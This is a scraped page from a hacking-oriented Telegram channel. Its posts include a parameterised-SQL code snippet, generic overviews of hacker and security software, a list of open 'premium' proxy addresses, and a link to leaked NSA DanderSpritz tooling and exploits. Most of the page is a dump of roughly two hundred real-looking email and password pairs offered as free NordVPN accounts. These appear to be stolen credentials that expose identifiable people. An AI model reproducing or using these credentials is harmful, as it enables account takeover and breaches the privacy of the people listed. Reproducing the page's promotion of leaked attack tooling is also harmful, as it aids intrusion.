UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.8K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from PRIVATE UNDERCODE
πŸ¦‘The executeSql() method has an argument intended to allow variables to be substituted into statements without risking SQL injection vulnerabilities:

db.readTransaction(function (t) {
t.executeSql('SELECT title, author FROM docs WHERE id=?', [id], function (t, data) {
report(data.rows[0].title, data.rows[0].author);
});
});
Sometimes, there might be an arbitrary number of variables to substitute in. Even in these case, the right solution is to construct the query using only "?" characters, and then to pass the variables in as the second argument:

function findDocs(db, resultCallback) {
var q = "";
for each (var i in labels)
q += (q == "" ? "" : ", ") + "?";
db.readTransaction(function (t) {
t.executeSql('SELECT id FROM docs WHERE label IN (' + q + ')', labels, function (t, data) {
resultCallback(data);
});
});
}

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from PRIVATE UNDERCODE
πŸ¦‘ specification introduces a set of APIs to manipulate client-side databases using SQL.> ANONYMOUSLY ! FULL CODE
Forwarded from PRIVATE UNDERCODE
Forwarded from PRIVATE UNDERCODE
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from PRIVATE UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ Common hacker software usage classification :
Pinterest.com/Undercode_Testing
πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹:

1) Prevention:
This is from From the perspective of security, a type of software involved, such as firewalls, virus checking software, system process monitors, port management programs, etc., are all such software .

> This type of software can ensure the safety and personal privacy of computer users to the greatest extent, and will not be destroyed by hackers. The network server also attaches great importance to the needs of such software, such as log analysis software and system intrusion software, which can help administrators maintain the server and track hackers who invade the system.

2) Information collection:
There are many types of information collection software, including scanning software such as port scanning, vulnerability scanning, weak password scanning, etc.; And spyware such as interception and interception of information packets. Most of them are software that is right and wrong.

> That is to say, no matter whether it is a decent hacker, an evil hacker, a system administrator, or a general computer user, user software can accomplish different purposes. In most cases, the frequency of hacker user software is higher because they need to rely on such software to scan the server in an all-round way to obtain as much information about the server as possible. After having a full understanding of the server In order to hack.

3) Third, Trojans and worms:
These are two types of software, but they work on the same principle, both are hidden and destructive by viruses. In addition, such software can also be operated by people with control rights, or by prior A well- designed program completes certain work. Of course, this type of software can also be used by system administrators as a tool for remote management of servers.

4) Flood: The
so-called "flood" is an information spam bomb. A large number of spam requests can cause the target server to overload and collapse. In recent years, DOS distributed attacks have become popular on the network. Simply put, it can also be classified here. Software. The flood software can also be used as a mail bomb or a chat bomb. These are simplified and fool-proof software programmed by cybersecurity enthusiasts, and are often used in the hands of β€œpseudo hackers” accused at the beginning of this book .

5) Password cracking:
The most practical way to guarantee network security is to rely on a password system with various encryption algorithms. A hacker may easily obtain a cipher password file, but without an encryption algorithm, it still cannot obtain a real password. Therefore, the use of password cracking software is imperative. Taking advantage of the high-speed computing power of the computer, such software can restore encrypted ciphertext using a password dictionary or exhaustive methods.

6) Deception:
If you want to obtain the plaintext password mentioned above, the hacker needs to restore the encryption algorithm of the ciphertext, but if it is a complex password, it is not so simple to crack. But is it more convenient for someone who knows the password to tell the hacker the prototype of the password directly? Deceptive software is designed for this purpose.

7) Disguise:
Various operations performed on the network will be recorded by the ISP and the server. If hacking is performed without good disguise, it will be easily traced to the hacker ’s location by anti-tracking technology, so disguise his own IP Address and identity are a very important compulsory course for hackers, but camouflage technology requires deep network knowledge. This kind of software will be used at the beginning without a solid foundation.

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from PRIVATE UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘The classification of network security software
twitter.com/UndercodeNews

πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹:

> Now let's take a look at the classification of network security software, because learning hacker knowledge is two interrelated processes: both learning how to hack, but also learn how to prevent hacking.


1) Firewall:

> This is the most common security mechanism software on the network. There are hardware and software in the firewall. Most readers may see software firewalls. Its functions are mainly to filter spam (to ensure that the system will not be attacked by bombs), prevent worm intrusion, prevent hacker intrusion, increase system privacy (protect sensitive data),

> monitor system resources in real time, prevent system crashes, and regularly maintain databases Back up the main information ... The firewall can patch the loopholes of the system itself, so that hackers have no chance to start. In addition, for enterprises with LANs, firewalls can restrict the opening of system ports and prohibit certain network services (to prevent Trojans).

2) Detection software:
There are tools on the Internet specifically for the removal of a hacker program, but this type of software is more integrated in antivirus software or firewall software. It can detect and remove Trojans and worms in the system.

> Software In order to protect the system from infringement, it will automatically protect the hard disk data, automatically maintain the registry file, detect the content and code, and monitor the open state of the system port. If the user needs, the software can also write relevant scripts to block the specified port (the firewall also has this function).

3) Backup tool: a tool
specifically used to back up data can help the server regularly back up the data and update the data at a set time, so that even if a hacker destroys the database on the server, the software can completely repair the received data in a short time .

> In addition, for individual users, this type of software can perform a full image backup of the hard disk. Once the system crashes, users can use this type of software to restore the system to its original state. For example, Ghost is the leader in this type of software.

4) Log recording and analysis tools:
For the server, log files are indispensable. Administrators can understand the server's request type and request source through the log, and judge whether the system has been hacked according to the log.

> Through the log analysis software, the administrator can easily trace back the invading hackers, find the source of the hackers' attacks, and then catch the hackers. This is why hackers often use IP address masquerading, server jumps when attacking, and clear log files after invading the server.

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from PRIVATE UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘PREMIUM PROXIES :

168.227.229.96 8888
2825 ms 12% (61) br Brazil - Aguai Elite -
159.8.114.37 8123
438 ms 88% (41) fr France - Clichy Elite -
103.119.54.188 8888
4571 ms 12% (68) cn China Elite -
88.198.33.232 1080
3626 ms 33% (68) de Germany - Unterfoehring Elite -
58.96.135.93 8080
4807 ms 6% (78) au Australia Elite -
85.90.215.111 3128
3317 ms 15% (70) ua Ukraine - Kharkiv Elite -
85.172.104.162 8000
697 ms 54% (56) ru Russia - Gelendzhik Elite -
80.187.140.26 8080
671 ms 100% (57) de Germany Elite -
64.225.112.121 8080
1654 ms 54% (58) us United States - New York Elite -
222.93.72.121 8118
3004 ms 13% (62) cn China - Suzhou Elite -
175.100.30.156 25
3506 ms 33% (56) kh Cambodia Elite -
139.199.201.249 1080
4022 ms 14% (69) cn China - Beijing Elite -
120.79.48.160 8080
2751 ms 30% (61) cn China Elite -
193.112.113.26 1080
3580 ms 12% (70) cn China Elite -
157.119.207.36 6666
3954 ms 15% (71) in India - Satara Elite -
159.138.1.185 80
3702 ms 21% (64) hk Hong Kong Elite -
103.70.162.181 8080
3344 ms 7% (72) in India - New Delhi Elite -
155.93.240.101 8080
2575 ms 22% (61) za South Africa - Brackenfell Elite -
134.249.141.148 8080
4769 ms 15% (64) ua Ukraine - Lviv Elite -
144.76.214.156 1080
3011 ms 44% (53) de Germany Elite -
118.24.89.206 1080
4111 ms 11% (59) cn China Elite -
182.253.31.82 8080
3877 ms 7% (73) id Indonesia - Surabaya Elite -
91.192.4.162 8090
3998 ms 10% (76) iq Iraq - Baghdad Elite -
101.4.136.34 80
1057 ms 48% (55) cn China Elite -
103.216.51.210 8080
1126 ms 12% (71) kh Cambodia - Phnom Penh Elite -
46.99.255.235 8080
3266 ms 8% (69) al Albania Elite -
91.207.61.196 1182
849 ms 5% (88) ua Ukraine Elite -
91.209.25.157 8080
2292 ms 16% (65) fr France - Maurepas Elite -
79.115.245.227 8080
2917 ms 17% (62) ro Romania - Oradea Elite -
78.46.40.156 8118
1262 ms 18% (70) de Germany - Nuremberg Elite -
46.28.229.78 3128
644 ms 3% (84) ru Russia - St Petersburg Elite -
200.70.22.74 8080
3349 ms 8% (67) ar Argentina - Rosario Elite -
200.108.183.2 8080
3065 ms 20% (77) uy Uruguay Elite -
145.239.121.218 3129
1739 ms 84% (48) gb United Kingdom Elite -
176.114.128.131 3128
4622 ms 3% (69) ru Russia - Bratsk Elite

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from PRIVATE UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘LEAKED ON GITHUB FRON NSA (as they say) :
> The goal of this project is to examine, reverse, and document the different modules available in the Equation Group's DanderSpritz post-exploitation framework leaked by the ShadowBrokers

πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹:

> get all doc and exploits > https://github.com/francisck/DanderSpritz_docs

> The sub-directories in the "Resources" directory contain different modules which are used by DanderSpirtz to provide capabilities such as packet capture, memory dumps, etc.

πŸ¦‘ Below are the codenames that correspond to the different modules and the potential capabilities based on examining the python code, comments, XML, available "command" txt files

> Folder Code Name Description / Functionality

DSky Darkskyline PacketCapture tool

DaPu DarkPulsar Appears to be a legacy implant, similar to PeddleCheap but older

Darkskyline DarkSkyline Contains tools to parse and filter traffic captured by DarkSkylin... and much more on

> https://github.com/francisck/DanderSpritz_docs
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ best shorten url services for earning 2020 :

1. Linkvertise
2. Adshrink.it
3. Shrinkme
4. Shrinkearn.com
5. Clk.sh
6. Smoner
7. ouo.io
8. Bc.vc
9. Shorte.st
10. Payskip.me
11. LinkBucks.com
12. Al.ly
13. AdF.ly
14. Oke.io
15. CPMlink.net
16. PowClick
17. Adyou.me
18. Fas.li
19. Link.TL
20. CutWin.com
21. Binbucks.com
22. DZ4Link.com
23. AdHy.pe
24. Spaste.com
25. Adfoc.us
26. URLCash.Net
27. Short.am
28. Shink.in
29. Linkrex.net
30. Wi.cr
31. Uii.io
32. Rom.io
33. Urle.co
34. Shrtfly
URL Shorteners That Does Not Exist
35. SkipLink.pw
36. Excel.Li
37. Blv.me
38. Petty.link
39. Dwindly
40. Uskip.me
41. VivAds
42. ClicksFly
43. Link-earn.com
44. P.PW
45. URLF.LY
46. Admy.link

- powered by wiki
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘PREMIUM NORDVPN βœ… :
t.me/UndercodeTesting

descurvydog805@yahoo.com:Monkey01! | @UNdercodeTesting Expires at: 2020/07/01
joelp72@gmail.com:1prelude | @UNdercodeTesting Expires at: 2022/03/31
e3rick@gmail.com:911Apple | @UNdercodeTesting Expires at: 2022/01/25
decar4314@hotmail.com:mitsou4314 | @UNdercodeTesting Expires at: 2023/12/20
379005913@qq.com:Wzt931213 | @UNdercodeTesting Expires at: 2021/04/05
gtmse3333@gmail.com:Changea2 | @UNdercodeTesting Expires at: 2022/10/03
yaroslav.okhotnikov@gmail.com:Alien12345 | @UNdercodeTesting Expires at: 2021/08/26
alextuasuun@gmail.com:Hummerh2 | @UNdercodeTesting Expires at: 2022/10/06
mattcutti@hotmail.com:Playmaster12 | @UNdercodeTesting Expires at: 2022/09/20
paparyan2@aol.com:Fun4unme | @UNdercodeTesting Expires at: 2021/12/25
ara.variyar@gmail.com:Asoiaf02 | @UNdercodeTesting Expires at: 2023/03/02
mer.laver@me.com:firefly13 | @UNdercodeTesting Expires at: 2023/02/21
udalon@gmail.com:Uda22lon | @UNdercodeTesting Expires at: 2021/08/15
dza35@hotmail.fr:dza19851985 | @UNdercodeTesting Expires at: 2021/03/02
jamesmulles@hotmail.com:Arsenal1 | @UNdercodeTesting Expires at: 2020/05/29
chodenation@hotmail.com:greekgod01 | @UNdercodeTesting Expires at: 2021/12/06
swanson.m@gmail.com:Smack123! | @UNdercodeTesting Expires at: 2020/06/01
rjymaxx@gmail.com:Aly55a3r1n | @UNdercodeTesting Expires at: 2021/11/21
lukas_fellner@web.de:luansa88 | @UNdercodeTesting Expires at: 2021/06/22
kspengos@yahoo.com:lcbojob01 | @UNdercodeTesting Expires at: 2021/02/20
mpg286@yahoo.co.uk:Stubbs15 | @UNdercodeTesting Expires at: 2021/02/02
xnobxxxx@gmail.com:221133fF | @UNdercodeTesting Expires at: 2020/06/04
annmarietyrer@yahoo.co.uk:Jaker7an | @UNdercodeTesting Expires at: 2021/02/03
darrenmichaud@hotmail.com:Chito_Kai1 | @UNdercodeTesting Expires at: 2020/06/03
yeotzunkai@gmail.com:Ninenine99 | @UNdercodeTesting Expires at: 2022/12/13
natto40@hotmail.com:hbkhbk101 | @UNdercodeTesting Expires at: 2020/06/04
brianvanwinden@hotmail.com:Judoka-1999 | @UNdercodeTesting Expires at: 2022/06/08
sam.crowley10@gmail.com:Samc1021 | @UNdercodeTesting Expires at: 2020/09/20
anton@motion-path.com:cleo2000 | @UNdercodeTesting Expires at: 2021/03/06
lewis.alfred@sky.com:Churchy1 | @UNdercodeTesting Expires at: 2021/05/02
aturquois@gmail.com:g0ld3nb0y | @UNdercodeTesting Expires at: 2023/02/07
beckylousue@hotmail.com:F2b3ggans5 | @UNdercodeTesting Expires at: 2022/03/15
rafjam@hotmail.com:Rafjam1! | @UNdercodeTesting Expires at: 2022/05/13
landon.davis89@gmail.com:samson89 | @UNdercodeTesting Expires at: 2022/06/20
cameronmcanespi@gmail.com:Zombieman12 | @UNdercodeTesting Expires at: 2020/08/10
visar_rox@hotmail.fr:Babi1990 | @UNdercodeTesting Expires at: 2023/03/24
asger.andersen1@gmail.com:An25As21 | @UNdercodeTesting Expires at: 2022/12/11
braedon.hausfeld@hotmail.com:2233rocks | @UNdercodeTesting Expires at: 2020/05/22
guff09@live.com:AndAfter09 | @UNdercodeTesting Expires at: 2022/05/11
rzc27893@gmail.com:Ryan2708 | @UNdercodeTesting Expires at: 2023/03/13
sladebomb@yahoo.com:boucher09 | @UNdercodeTesting Expires at: 2022/05/27
haishaxhiei@yahoo.com:Mick0922m$ | @UNdercodeTesting Expires at: 2021/06/11
gprots100@gmail.com:Yuriygeorge1 | @UNdercodeTesting Expires at: 2022/10/22
andree_es@hotmail.com:Aa_24019200 | @UNdercodeTesting Expires at: 2020/06/21
iverson.91@hotmail.it:ailoving3 | @UNdercodeTesting Expires at: 2020/05/22
jayhc@live.co.uk:Harley55842 | @UNdercodeTesting Expires at: 2020/06/05
devildognich@gmail.com:mittens1 | @UNdercodeTesting Expires at: 2023/04/17
oliver.calloway@hotmail.com:Ozinator747 | @UNdercodeTesting Expires at: 2020/09/07
novidjaff@gmail.com:Sept1083 | @UNdercodeTesting Expires at: 2021/05/04
erik.ga.karlsson@gmail.com:kokirore97 | @UNdercodeTesting Expires at: 2023/04/28
kylehattan@gmail.com:2006Mazda6 | @UNdercodeTesting Expires at: 2023/01/28
roamwiz@hotmail.com:Bobthemonkey1 | @UNdercodeTesting Expires at: 2021/05/22
masterlock88@web.de:Cmpunk88 | @UNdercodeTesting Expires at: 2020/06/17
shockflare100@gmail.com:coolguy22 | @UNdercodeTesting Expires at: 2021/05/01
mimada6@gmail.com:danielle8 | @UNdercodeTesting Expires at: 2020/05/24
b.humez@gmail.com:Papycastor1 | @UNdercodeTesting Expires at: 2020/05/26
ppukka@gmail.com:sitdown1 | @UNdercodeTesting Expires at: 2021/03/06
sunekrogstrup@gmail.com:nummer57 | @UNdercodeTesting Expires at: 2020/07/06
gregory_cogels@hotmail.com:papillon1990 | @UNdercodeTesting Expires at: 2022/06/20
desbotiron@yahoo.com:GoNavy123!!! | @UNdercodeTesting Expires at: 2020/10/18
mseaton@gmail.com:Madmax2013! | @UNdercodeTesting Expires at: 2021/06/29
amdal.even@gmail.com:Dino1997 | @UNdercodeTesting Expires at: 2021/08/17
stevereno359@yahoo.com:birkdale7 | @UNdercodeTesting Expires at: 2023/02/18
ddregis@hotmail.co.uk:Del0rean | @UNdercodeTesting Expires at: 2021/07/13
jameshamilton1405@gmail.com:Mussyman100 | @UNdercodeTesting Expires at: 2023/02/13
rrtuddy@gmail.com:Nugget03 | @UNdercodeTesting Expires at: 2020/05/25
francoisb62@hotmail.com:Grepolis14 | @UNdercodeTesting Expires at: 2022/01/25
jordanwhibley@hotmail.co.uk:Jw180491 | @UNdercodeTesting Expires at: 2022/07/08
balian028@hotmail.de:Warhammer028 | @UNdercodeTesting Expires at: 2021/05/21
jming29@gmail.com:Mingster33 | @UNdercodeTesting Expires at: 2021/03/06
lrsc209@gmail.com:Cinder209 | @UNdercodeTesting Expires at: 2020/05/25
coellophotos@gmail.com:fast501989 | @UNdercodeTesting Expires at: 2022/05/20
roman.foltan@yahoo.com:910119Rf | @UNdercodeTesting Expires at: 2020/06/15
rainmanishere@yahoo.com:Etvncat7 | @UNdercodeTesting Expires at: 2022/01/23
ashloader9@gmail.com:Ashleyloader21 | @UNdercodeTesting Expires at: 2020/09/16
narin4life@hotmail.com:!P3452879p! | @UNdercodeTesting Expires at: 2022/10/05
jmackrocks96@gmail.com:Hibobie2 | @UNdercodeTesting Expires at: 2020/06/02
tpruss97@gmail.com:Cap3C0d@12 | @UNdercodeTesting Expires at: 2020/06/07
patric@hx5.us:N0vember | @UNdercodeTesting Expires at: 2020/06/11
mark@thetaylortribe.org:5Cuff13r | @UNdercodeTesting Expires at: 2022/05/01
viromist15@gmail.com:M1stry02 | @UNdercodeTesting Expires at: 2023/03/24
brodiev@hotmail.com:dhkqgq57 | @UNdercodeTesting Expires at: 2022/03/27
riffle4@hotmail.com:Sam1296B | @UNdercodeTesting Expires at: 2022/01/30
romesvonwolf@gmail.com:Erinbee3 | @UNdercodeTesting Expires at: 2023/04/02
kkennedy49@gmail.com:Kevin0074 | @UNdercodeTesting Expires at: 2021/01/09
chris.bordewyk@gmail.com:calico02 | @UNdercodeTesting Expires at: 2020/09/05
cbarton555@gmail.com:Anguish12 | @UNdercodeTesting Expires at: 2023/06/14
darshitvalia@gmail.com:dars1986 | @UNdercodeTesting Expires at: 2020/10/17
jmiesner1@gmail.com:gorilla142 | @UNdercodeTesting Expires at: 2022/05/13
wmuzafar@yahoo.com:success1 | @UNdercodeTesting Expires at: 2022/08/30
tyrell.stokes@yahoo.com:BlueGold189 | @UNdercodeTesting Expires at: 2020/05/26
joe_hill10@hotmail.com:Themonke3 | @UNdercodeTesting Expires at: 2020/06/18
christoffer.stewart@hotmail.com:Iwbtvb123 | @UNdercodeTesting Expires at: 2021/12/29
the_white_jem@hotmail.com:Ali1kinobe | @UNdercodeTesting Expires at: 2023/05/05
bpandaman@gmail.com:panda1107 | @UNdercodeTesting Expires at: 2023/01/25
romeo.natividad@gmail.com:Sumoboy1 | @UNdercodeTesting Expires at: 2022/06/24
kingkonghi12@gmail.com:Abc779574 | @UNdercodeTesting Expires at: 2023/04/01
alfoster@sky.com:Ffordd13 | @UNdercodeTesting Expires at: 2022/09/10
907dragonslayer@gmail.com:Benjay255 | @UNdercodeTesting Expires at: 2021/01/01
romppa@live.fi:z789opcc | @UNdercodeTesting Expires at: 2020/05/24
anastasia_parkhomenko@hotmail.com:Natasha10 | @UNdercodeTesting Expires at: 2020/05/28
lunosnyper@gmail.com:paintball89 | @UNdercodeTesting Expires at: 2021/02/09
ajpieffer@gmail.com:Blindmice17 | @UNdercodeTesting Expires at: 2022/09/18
jared.lomax@outlook.com:lomax9240 | @UNdercodeTesting Expires at: 2023/02/04
onefivethreefish@hotmail.com:Matthew633 | @UNdercodeTesting Expires at: 2022/10/20
runarbredal@gmail.com:Tryllekrus2k3 | @UNdercodeTesting Expires at: 2020/05/26
dravenkish@gmail.com:Roo123dog | @UNdercodeTesting Expires at: 2021/08/25
nightus2000@yahoo.com:REBelweb007 | @UNdercodeTesting Expires at: 2022/02/05
zrtexn@gmail.com:Aft56rta | @UNdercodeTesting Expires at: 2020/06/08
kristen_b@hotmail.com:Stoneycreek1 | @UNdercodeTesting Expires at: 2022/08/23
khancock0928@gmail.com:20Skittles03! | @UNdercodeTesting Expires at: 2020/05/20
bjornhfwold@gmail.com:VanjaPk97 | @UNdercodeTesting Expires at: 2021/06/12
nofic@mail.fresnostate.edu:lysergic1 | @UNdercodeTesting Expires at: 2022/06/15
troylyttle98@gmail.com:Troylyttle123 | @UNdercodeTesting Expires at: 2020/06/12
choco.x.panda@gmail.com:fernanda97 | @UNdercodeTesting Expires at: 2020/06/05
joelstav82@gmail.com:Joelstav1 | @UNdercodeTesting Expires at: 2020/06/15
kellysteeledenver@yahoo.com:kelly8874 | @UNdercodeTesting Expires at: 2020/10/25
silent400@gmail.com:19174454288Jay | @UNdercodeTesting Expires at: 2021/03/12
erik.lind.svensson@gmail.com:pQUs06Ks | @UNdercodeTesting Expires at: 2022/06/21
billymorahan@outlook.com:Charlie2012 | @UNdercodeTesting Expires at: 2021/04/30
pmugiz@aol.com:beloved1 | @UNdercodeTesting Expires at: 2020/09/09
viper_speed@excite.com:torso899 | @UNdercodeTesting Expires at: 2020/06/02
esant346@gmail.com:D1norex1 | @UNdercodeTesting Expires at: 2021/06/22
ido.segev23@gmail.com:adv81515 | @UNdercodeTesting Expires at: 2022/10/16
c_cmiller2003@yahoo.com:Opie040307 | @UNdercodeTesting Expires at: 2021/04/19
andrew.s.garrison1986@gmail.com:Jimm1972 | @UNdercodeTesting Expires at: 2020/11/03
travisbennett79@aol.com:travis0710 | @UNdercodeTesting Expires at: 2021/03/30
butrintblakaj@web.de:Butrint9 | @UNdercodeTesting Expires at: 2020/06/09
rockygem@sky.com:Rawowl08 | @UNdercodeTesting Expires at: 2022/08/13
ryan.stubblefield@gmail.com:grdm43EV# | @UNdercodeTesting Expires at: 2022/10/04
ayybdon@gmail.com:Pummelweed1 | @UNdercodeTesting Expires at: 2020/06/09
rileyhxc@gmail.com:Almost12 | @UNdercodeTesting Expires at: 2020/06/16
chris.filipowicz@gmail.com:4Bi5Do5c | @UNdercodeTesting Expires at: 2021/08/19
csfitzgerald0106@gmail.com:Finley13 | @UNdercodeTesting Expires at: 2020/08/19
kevin.a@hotmail.de:Addidas1992 | @UNdercodeTesting Expires at: 2021/05/18
326776315@qq.com:Haozi1989 | @UNdercodeTesting Expires at: 2023/04/17
stephankreuzer1@gmail.com:Teddy123 | @UNdercodeTesting Expires at: 2020/06/01
ravinr2008@gmail.com:karann03 | @UNdercodeTesting Expires at: 2021/12/05
dara.ocallaghan@hotmail.co.uk:Dublin1984 | @UNdercodeTesting Expires at: 2023/10/01
jonos_e-mail67@hotmail.com:Ran67gra | @UNdercodeTesting Expires at: 2020/05/29
shorty3525@yahoo.com:23142Wowza | @UNdercodeTesting Expires at: 2022/06/25
tasoscat@gmail.com:ZylisBlue12 | @UNdercodeTesting Expires at: 2020/05/25
GoneInsaneNZ@gmail.com:iv68tqr32 | @UNdercodeTesting Expires at: 2022/06/29
andrefsalribeiro@hotmail.com:15caralhos | @UNdercodeTesting Expires at: 2023/04/28
jakeselzler@msn.com:Braves4life! | @UNdercodeTesting Expires at: 2020/10/19
jeanollivier31@gmail.com:Martines31 | @UNdercodeTesting Expires at: 2020/06/18
daveshenton007@aol.com:Cantona07 | @UNdercodeTesting Expires at: 2022/09/09
wolfgangs246@gmail.com:Exicutus123 | @UNdercodeTesting Expires at: 2022/08/25
andreasgarmark7@hotmail.com:Kongene9 | @UNdercodeTesting Expires at: 2020/05/22
eaglesean2002@yahoo.com:Bobsaget1 | @UNdercodeTesting Expires at: 2022/05/13
takadajustin@gmail.com:DingDing1 | @UNdercodeTesting Expires at: 2020/06/07
wirelessemporium@verizon.net:Deep7936 | @UNdercodeTesting Expires at: 2021/05/25
rsd.dooling@verizon.net:Loonytooner2 | @UNdercodeTesting Expires at: 2020/05/22
cgduy.nguyen@gmail.com:congduy1 | @UNdercodeTesting Expires at: 2023/03/26
bennycrimmins1904@gmail.com:Ireland1904 | @UNdercodeTesting Expires at: 2022/05/03
taylor.91@hotmail.co.uk:Blue2491 | @UNdercodeTesting Expires at: 2020/05/25
mininggangsters@gmail.com:lucapro200 | @UNdercodeTesting Expires at: 2020/10/11
wyssenmichael@gmail.com:dudikopf1999 | @UNdercodeTesting Expires at: 2025/06/08
paulfdempsey@gmail.com:ocean1221 | @UNdercodeTesting Expires at: 2023/02/17
ecolbs@aol.com:Danielle28 | @UNdercodeTesting Expires at: 2022/05/05
vivio37@live.fr:J90Fevrier37T | @UNdercodeTesting Expires at: 2020/06/07
moser.luca@gmail.com:jellybelly123 | @UNdercodeTesting Expires at: 2021/11/05
timothy.fuhrmann11@gmail.com:T.i.m.1. | @UNdercodeTesting Expires at: 2020/05/27
labc13@hotmail.com:Mystic111 | @UNdercodeTesting Expires at: 2022/08/12
rasmus.wall@gmail.com:nmi2snm8 | @UNdercodeTesting Expires at: 2020/05/20
dion.zavitsanos7@gmail.com:j1mm3y77 | @UNdercodeTesting Expires at: 2020/05/29
chase18090@hotmail.com:Lightblue3 | @UNdercodeTesting Expires at: 2022/03/18
danyranc@hotmail.com:udcufqpz1 | @UNdercodeTesting Expires at: 2022/07/01
chris_s_bills@yahoo.co.uk:Babyjames1 | @UNdercodeTesting Expires at: 2021/11/30
armand.posthumus@gmail.com:Piesang2 | @UNdercodeTesting Expires at: 2021/12/02
rtanner11@gmail.com:got2luvtnr | @UNdercodeTesting Expires at: 2022/10/27
andreasjohann@optik-johann.de:Elitegamer346! | @UNdercodeTesting Expires at: 2022/10/28
jingoe1001@yahoo.co.uk:Tuesday1001 | @UNdercodeTesting Expires at: 2020/12/03
conshaw1999@gmail.com:shawsi99 | @UNdercodeTesting Expires at: 2021/01/03
drew19822004@aol.com:Thehammer2007! | @UNdercodeTesting Expires at: 2020/05/22
alannews123@gmail.com:a57779477 | @UNdercodeTesting Expires at: 2021/11/24
peternels@snet.net:KLam138! | @UNdercodeTesting Expires at: 2021/02/14
subs13@hotmail.com:Floppy13 | @UNdercodeTesting Expires at: 2020/07/01
chrisddavis23@gmail.com:Appleforest1 | @UNdercodeTesting Expires at: 2020/06/05
steve_casha@yahoo.co.uk:Thenry14 | @UNdercodeTesting Expires at: 2020/06/09
jabezcarrigan@googlemail.com:football0800 | @UNdercodeTesting Expires at: 2020/06/06
bond0401@hotmail.com:L0nglak3 | @UNdercodeTesting Expires at: 2023/10/05
zemphyra@gmail.com:Percy0718 | @UNdercodeTesting Expires at: 2020/06/13
dhaub666@gmail.com:Destruction0 | @UNdercodeTesting Expires at: 2022/03/29
vtsfoam@hotmail.com:Amoaree1 | @UNdercodeTesting Expires at: 2021/04/29
charronhernandez@gmail.com:JAZmyn03 | @UNdercodeTesting Expires at: 2021/02/02
blainesnider@gmail.com:9012LIve! | @UNdercodeTesting Expires at: 2021/12/27
bthompson1638@gmail.com:Warcraft3! | @UNdercodeTesting Expires at: 2020/06/20
ezulqarni@yahoo.com:ebrahim1599 | @UNdercodeTesting Expires at: 2023/03/25
ryandow88@googlemail.com:Jackjack88 | @UNdercodeTesting Expires at: 2020/05/28
lordnick01@hotmail.com:1Panther | @UNdercodeTesting Expires at: 2021/01/11
christopheralanlawrence69@hotmail.com:marvo101 | @UNdercodeTesting Expires at: 2021/11/04
tobiaskarlsen@gmail.com:Tskmunk2045 | @UNdercodeTesting Expires at: 2022/04/08
reuznl@gmail.com:p2u5Rabr!! | @UNdercodeTesting Expires at: 2020/05/22
elliotrutter1@hotmail.co.uk:Kingsrocks1 | @UNdercodeTesting Expires at: 2020/06/01
makishi13@gmail.com:Damian1997 | @UNdercodeTesting Expires at: 2020/05/23
myers.alex@gmail.com:St4t10nk1! | @UNdercodeTesting Expires at: 2022/01/18
ryan.trainor92@gmail.com:Sports23 | @UNdercodeTesting Expires at: 2021/02/27
jacobmad24@yahoo.com:1034465jM | @UNdercodeTesting Expires at: 2022/03/26
erikinnvik@outlook.com:ilikepizza21 | @UNdercodeTesting Expires at: 2021/08/22
matte.schiavon@gmail.com:Caparezza97 | @UNdercodeTesting Expires at: 2023/06/12
reioibm18@gmail.com:Macapple18 | @UNdercodeTesting Expires at: 2020/06/15
hurleyx8@gmail.com:LeeroyJenkinsX8 | @UNdercodeTesting Expires at: 2021/12/01
seahurley@hotmail.com:97neon97NEON | @UNdercodeTesting Expires at: 2020/06/09
bowdenta@yahoo.com:Trkstpl1 | @UNdercodeTesting Expires at: 2021/11/27
mari.fium@gmail.com:Marilla8 | @UNdercodeTesting Expires at: 2021/01/16
ltsuek@gmail.com:Boiling1up | @UNdercodeTesting Expires at: 2020/12/02
david.goossens@gmail.com:Deneef77 | @UNdercodeTesting Expires at: 2020/05/27
lazarusrising@gmail.com:19226834Alpha | @UNdercodeTesting Expires at: 2022/04/16
ryan848black@gmail.com:Homig225 | @UNdercodeTesting Expires at: 2020/05/28
joliendebruyne4@hotmail.com:Coppens9 | @UNdercodeTesting Expires at: 2023/02/22
caitlinmv9@yahoo.com:Luckyducky911 | @UNdercodeTesting Expires at: 2021/08/06
rhysboydmurray@gmail.com:Nexus_11$$ | @UNdercodeTesting Expires at: 2020/06/26
